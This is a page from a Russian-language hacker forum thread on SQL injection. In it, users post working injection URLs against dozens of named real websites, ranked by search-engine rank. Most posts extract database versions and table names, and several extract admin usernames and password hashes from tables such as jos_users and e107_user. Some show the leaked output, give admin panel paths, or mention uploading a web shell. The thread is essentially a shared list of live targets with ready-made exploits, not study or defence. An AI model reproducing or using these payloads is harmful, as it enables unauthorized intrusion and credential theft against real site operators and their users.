SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    pr7 тиц40
    http://www.lib.udel.edu/ej/index.php?S=%' and 0 union select 1,unhex(hex(version())),3,4,5,6,7 from mysql.user/* &I=26
     
    2 people like this.
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    veterans-gaming.com
    PR - 1
    Code:
    http://www.veterans-gaming.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    globalassaultunit.net
    PR - 1
    Code:
    http://globalassaultunit.net/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    www.clankillas.net
    PR - 3
    Code:
    http://www.clankillas.net/portal/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    totalgamersnetwork.com
    PR - 1
    Code:
    http://www.totalgamersnetwork.com/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    hu.cring.eu
    PR - 1
    Code:
    http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--
    Примерно так выдираем хеш и никнейм админа:
    Code:
    http://hu.cring.eu/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
    Админка:
    Code:
    http://hu.cring.eu/e107_admin/admin.php
    как залить шелл
     
    1 person likes this.
  3. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    http://www.shopland-n.com/town_info.php?id=-149+union+select+1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7+--+

    http://www.appliedartsmag.com/opinions.php?id=-37+union+select+1,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),3,4,5

    http://www.creativeniche.ca/candidate_jobs_detail.cfm?jobid=-1304+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),user(),database()),10,11

    http://www.thunderbirdmarine.com/email-friend.php?ID=-2987+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,ID,username,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110+from+Users+limit+0,1
     
    #13283 brutos, 28 Oct 2010
    Last edited: 28 Oct 2010
    1 person likes this.
  4. Kamik

    Kamik Member

    Joined:
    2 Dec 2008
    Messages:
    122
    Likes Received:
    85
    Reputations:
    8
    Онлаин магазин.
    PHP:
    http://www.historicalcenter.ru/etc.php?id=6&idg=420+union+select+1,concat_WS(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
    PHP:
    histcenter@localhost:5.0.45:histcenter
    Салон красоты да ляпоты =)
    PHP:
    http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10/*
    PHP:
    admin_vashstile@localhost:5.0.22-log:admin_vashstile
    Продолжаем копать получаем
    PHP:
    http://www.vashstile.ru/profile.php?id=12+union+select+1,2,3,concat_WS(0x3a,id,username,uncrypt_pass,email,status),5,6,7,8,9,10+from+users+limit+0,1/*
    админка тут
    PHP:
    http://www.vashstile.ru/admin/
    правда акк админа я так и не нашел :D
     
    #13284 Kamik, 28 Oct 2010
    Last edited by a moderator: 28 Oct 2010
  5. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    [​IMG]

    http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14+--

    4.0.26-log Uwww64S@localhost udb64 portbld-freebsd4.10

    http://www.elves.ru/index.php?id=301&dol=-3+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,login,pass,email),6,7,8,9,10,11,12,13,14+from+client+limit+1+offset+495--
     
    1 person likes this.
  6. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.magelan.su/news.php?id=1075'+and+1=0+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+Where+table_schema='magelan_base'+--+
    ТИЦ : 230
     
  7. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://www.degreeart.com/newsite/viewpress.php?id=104 union select 1,version(),3,4,5,6-- 1

    http://www.farcountrypress.com/details.php?id=214' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77-- 1

    http://eurocatwalk.com/photo_details.php?uid=-428 union select 1,2,3,4,5,version(),7,8,9,10-- 1

    http://www.gamedogped.com/details.php?id=48212 or 1 group by concat((select concat(username,0x3a,password) from users limit 0,1),floor(rand(0)*2))having min(0) or 1-- 1

    http://www.gamepile.com/details.php?id=-21 /*!Union*/ select 1,2,table_name,4,5,6,7,8 from information_schema.`tables`-- 1
     
    2 people like this.
  8. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    tidewaterintergroup.org
    PR - 5
    Code:
    http://www.tidewaterintergroup.org/e107_plugins/aa_meetings/directory.php?Day_qf=d0s&City_qf=%2522+union+select+null,null,null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null,null,null,null,null,null,null+from+e107_user+where+user_id=1--+
    Code:
    http://www.tidewaterintergroup.org/e107_admin/admin.php
    wildcatsclan.net
    PR - 1
    Code:
    http://www.wildcatsclan.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1
    Code:
    http://www.wildcatsclan.net/e107_admin/admin.php
    vancouverphoto.net
    PR - 1
    Code:
    http://www.vancouverphoto.net/e107_plugins/aacgc_event_listing/Event_Details.php?.1%20and%200%20union%20select%201,2,3,4,5,concat_ws(0x3a,user_loginname,user_password),7,8,9,10%20from%20e107_user%20where%20user_admin=1%20limit%200,1
    Code:
    http://www.vancouverphoto.net/e107_admin/admin.php
     
    #13288 ~d0s~, 28 Oct 2010
    Last edited: 28 Oct 2010
    1 person likes this.
  9. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
     
    3 people like this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.ozkulkaro.com.tr/dinamik/urun_grubu.php?urun_id=5+and+1=0+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,username,password),1),1),6,7,8,9+from+admin--&menu=61

    http://www.academictutorials.com/quiz.asp?id=66+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+msysaccessobjects
     
    _________________________
    #13290 Konqi, 28 Oct 2010
    Last edited: 28 Oct 2010
    1 person likes this.
  11. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    http://www.agetec.com/catalog/news_detail.php?id=-41+union+select+1,2,3,user(),5,6,7--
     
  12. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Code:
    http://www.moskva-rabota.ru/index.php?id=-398+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--
     
    1 person likes this.
  13. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    http://www.artbukhman.com/payment.php?gal=-2&sub=-64&id=-264%20union%20select%201,version(),3,4,5,6,7%20--

    5.1.47-community-log
     
  14. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    joomla

    tp.by
    PR 5
    Тиц 60

    Code:
    http://www.tp.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    cnko.net
    PR 2
    Тиц 30

    Code:
    http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    tdzemi.ru
    PR 2
    Тиц 30

    Code:
    http://www.tdzemi.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    ef2012.com
    PR 3
    Тиц 10

    Code:
    http://www.ef2012.com/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    calcweb.org
    PR 5
    Code:
    http://www.calcweb.org/index.php?option=com_artforms&task=vferforms&id=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    forward.by
    PR 2
    Code:
    http://forward.by/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    cnko.net
    PR 2
    Тиц 30

    Code:
    http://www.cnko.net/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    rcl.ru
    PR 4
    Тиц 20

    Code:
    http://www.rcl.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    swedstyle.ru
    Тиц 10
    Code:
    http://www.swedstyle.ru/index.php?option=com_artforms&task=ferforms&viewform=1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    напоминаю,что в джумла админка по умолчанию /administrator
     
  15. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Официальный сайт ФК "ХИМКИ"
    Code:
    http://www.fckhimki.ru/modules/content/index.php?current_id=-37+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(%20),database()),10,11,12,13+--+
    Database Version: 4.0.27-max-log
    Database name: fckhimki_new1
    User name: [email protected]

    ==================================================

    Sigmadesigns.com
    Code:
    http://www.sigmadesigns.com/solutions_subcat.php?id=1'+or+1+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+0,1),1,63),floor(rand(0)*2))having+min(0)+--+
    Database Version: 5.1.30-community-log
    Database name: dd04318780
    User name: [email protected]

    ==================================================

    Worldmusicinstitute.org
    Code:
    http://www.worldmusicinstitute.org/sections.php?id=18+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+--+
    Database Version: 4.1.25-Debian_mt1-log
    Database name: worldmusicinstitute_org_-_ucms
    User name: [email protected]

    ==================================================
     
    #13295 TreV@N, 30 Oct 2010
    Last edited: 30 Oct 2010
    2 people like this.
  16. CodeSender:)

    CodeSender:) Elder - Старейшина

    Joined:
    29 Jul 2010
    Messages:
    245
    Likes Received:
    115
    Reputations:
    23
    http://cats1004.com/info_list.php?categoryi=-1+union+select+concat_ws(0x3a,database(),user(),version())+--

    Database: realty_cats1004
    User: realty_cats1004@localhost
    Version: 4.0.22-log
     
    #13296 CodeSender:), 30 Oct 2010
    Last edited: 30 Oct 2010
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://www.spynets.com/cheats/details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
     
  18. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.theart.ru/cgi-bin/performance.cgi?id=9405'+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,group_concat(table_name),26,27,28,29,30,31,32+from+information_schema.tables+where+table_Schema=0x74686561727472755f6f7264656e+--+
    ТИЦ : 325 PR: 4


    http://polbileta.ru/cgi-bin/cinema/performance.cgi?id=76+and+1=0+UnIon+selECt+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+From+information_schema.schemata+--+

    п.с TreV@N , уверин что половина твоих скуль бoян!
     
  19. CodeSender:)

    CodeSender:) Elder - Старейшина

    Joined:
    29 Jul 2010
    Messages:
    245
    Likes Received:
    115
    Reputations:
    23
    http://www.bheru.com/indianews/?l=4&id=3414+and+1=0+union+select+unhex(hex(concat_ws(0x3a,user_name,password)))+from+admininfo+--

    Database: bherudb
    User: bherudbuser@localhost
    Version: 5.0.79

    Шелл льётся в 2 клика и редактирование соуса паги:3

    http://www.nexusarts.com.au/view_performer_details.php?id=61+UnIon+selECt+1,concat_ws(0x3a,user_name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66+from+users+--

    Database: nexusprd
    User: [email protected]
    Version: 5.0.91-log

    Жирнючий сайт...Админку найти так и не смог, пароль в хешбазах есть.
     
    #13299 CodeSender:), 30 Oct 2010
    Last edited: 30 Oct 2010
  20. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    premiera-salon.com
    Тиц 20
    Code:
    http://premiera-salon.com/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    15-sotok.ru
    PR 2
    Code:
    http://www.15-sotok.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    white-line.ru
    Тиц 10
    PR 1
    Code:
    http://www.white-line.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    www.master-obraza.ru
    Тиц 10
    Code:
    http://www.master-obraza.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    ies-nn.ru
    PR 1
    Code:
    http://www.ies-nn.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    pioner-forma.ru
    Тиц 10
    Code:
    http://www.pioner-forma.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
    12-school.ru
    PR 1
    Code:
    http://www.12-school.ru/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x3a,username,password%29,3,4,5,6%20from%20jos_users%23
     
Thread Status:
Not open for further replies.